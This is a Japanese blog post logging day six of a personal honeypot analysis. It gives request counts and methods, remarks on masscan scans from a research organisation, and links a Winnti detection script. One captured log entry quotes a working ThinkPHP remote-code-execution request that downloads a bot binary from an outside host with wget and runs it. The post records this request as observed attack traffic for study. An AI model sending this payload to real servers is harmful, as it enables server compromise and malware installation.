honeypotの簡易解析6日目

2019-04-06のアクセス数は50件でした。

■送信元IPアドレスの数は 44件です。

■メソッドの種別は以下です。

GET・・47件
PUT・・0件
POST・・2件
HEAD・・1件
CONNECT・・0件
PROFFIND・・0件
その他・・0件

気になるlog

19件目。thinkPHPの脆弱性からのマルウェアダウンロード。

[2019-04-06 09:32:40+0900] 189.163.142.93 127.0.0.1:80 "GET /index.php?
GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;wget%20http://love.thotiana.live/bins/x86.bot;cat%20x86.bot%20>%20fucklol;chmod%20777%20fucklol;./fucklol%20thinkphp HTTP/1.1
Host: 127.0.0.1
User-Agent: WOW
Accept: */*
Accept-Language: en-US,en;q=0.8
Connection: Keep-Alive

また来てますね!IPアドレスは違います。

44~45件目。masscan!

[2019-04-06 20:29:46+0900] 104.152.52.30 blank:80 "GET / HTTP/1.0" 200 False 
GET / HTTP/1.0
User-Agent: masscan/1.0 (https://github.com/robertdavidgraham/masscan)
Accept: */*

[2019-04-06 20:33:40+0900] 104.152.52.30 blank:80 "GET / HTTP/1.0" 200 False 
GET / HTTP/1.0
User-Agent: masscan/1.0 (https://github.com/robertdavidgraham/masscan)
Accept: */*

User-Agentにgit-hubのソースまであるやん、素人が間違えて2回実行したんだろうな、と思ってIPアドレスを調べてみたら、定期的にscanする組織の通信だった。

http://www.internettl.org/

世の中には様々な組織があるんだなぁ。勉強になる。

調査系の通信について

上記のmasscanの件で、理解を深めておく必要があると感じました。

twitterでwinnti感染有無を調べるcodeが流れていたので紹介しておきます。

https://github.com/TKCERT/winnti-nmap-script

動かしてキャプチャしてみたが、httpではないため、このhoneypotではキャプチャできなかった。